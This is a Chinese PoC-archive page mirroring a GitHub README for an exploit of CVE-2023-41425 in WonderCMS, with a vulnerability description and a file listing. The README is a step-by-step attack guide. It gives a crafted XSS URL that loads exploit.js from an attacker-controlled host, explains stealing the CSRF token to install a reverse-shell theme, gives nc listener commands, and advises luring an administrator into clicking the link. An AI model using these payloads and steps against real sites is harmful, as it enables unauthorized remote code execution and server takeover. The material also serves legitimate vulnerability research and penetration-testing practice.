POC详情: 3eeea610c7a7857f77038aa810efd9e60999f858

来源
https://github.com/samu21req/CVE-2023-41425
关联漏洞
标题: WonderCMS 安全漏洞 (CVE-2023-41425)
描述:WonderCMS是一套基于PHP的开源内容管理系统(CMS)。 WonderCMS v.3.2.0版本至v.3.4.2版本存在安全漏洞。攻击者利用该漏洞通过上传到installModule组件的特制脚本执行任意代码。
介绍
# WonderCMS Exploit for CVE-2023-41425

## Description
This script exploits a Cross-Site Scripting (XSS) vulnerability in WonderCMS to deliver a reverse shell to the attacker's machine. It works by leveraging the XSS to inject malicious JavaScript, steal the CSRF token, and install a reverse shell theme. There is no need
to be admin or know admin password. 

## How It Works
1. The attacker serves the `exploit.js` file via a web server (e.g., Python's `http.server`).
2. The attacker crafts a malicious URL that injects this script into the target site.
3. The script:
   - Steals the CSRF token from the page.
   - Sends requests to install and execute a reverse shell theme on the victim's server.
   - Triggers the reverse shell to connect back to the attacker's machine.

## Prerequisites
- A web server to host `exploit.js`.
- A listener for the reverse shell (e.g., `nc -lvnp <port>`).
- Reverse shell ZIP file available online (e.g., `rev.zip`).
- Admin to click on malicious link (e.g. Social Engineering).

## Usage
1. **Configure the script:**
   Edit the constants in `exploit.js`:
   - `CMS_URL`: Base URL of the target (e.g., `http://victim.abc/cms`).
   - `ATTACKER_IP`: Your machine's IP address (e.g., `10.10.14.123`).
   - `ATTACKER_LISTENER_PORT`: The port you're listening on (e.g., `4444`).
   - `REV_SHELL_URL`: The URL hosting your reverse shell ZIP file (e.g., `http://10.10.14.123/rev.zip`).

2. **Host the script:**
   Start a web server in the directory containing `exploit.js`:
   ```
   python3 -m http.server 8000
   ```

3. **Craft the exploit URL:** 
    Replace `<ATTACKER_IP>` and `<PORT>` with your details in the following template. Fill in `<WONDER_CMS_ROOT_URL` with the URL of the installation of WonderCMS in the victim website. To find this, you can look for the login url, then the root URL is one directory above, e.g. `http://victim.abc/wondercms/loginURL/`, the root url would be `http://victim.abc/wondercms/`
    ```
    http://<WONDER_CMS_ROOT_URL>/index.php?page=loginURL?\"></form><script+src=\"http://<ATTACKER_IP>:<PORT>/exploit.js\"></script><form+action=\"
    ```

4. **Execute the attack:** 
    Share the malicious URL with the target administrator. Once the link is visited, the reverse shell is delivered, and the attacker gets access.

5. **Start the listener:** 
    On your machine, run:
    ```
    nc -lvnp <ATTACKER_LISTENER_PORT>
    ```

## Disclaimer
This code is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

## References
This is based on https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413 by https://github.com/prodigiousMind with a few tweaks and fixes. Hopefully more intuitive to use.

## License
MIT License
文件快照

 [4.0K]  /data/pocs/3eeea610c7a7857f77038aa810efd9e60999f858
├── [2.3K]  exploit.js
├── [1.0K]  LICENSE
├── [2.6K]  main.zip
└── [2.8K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。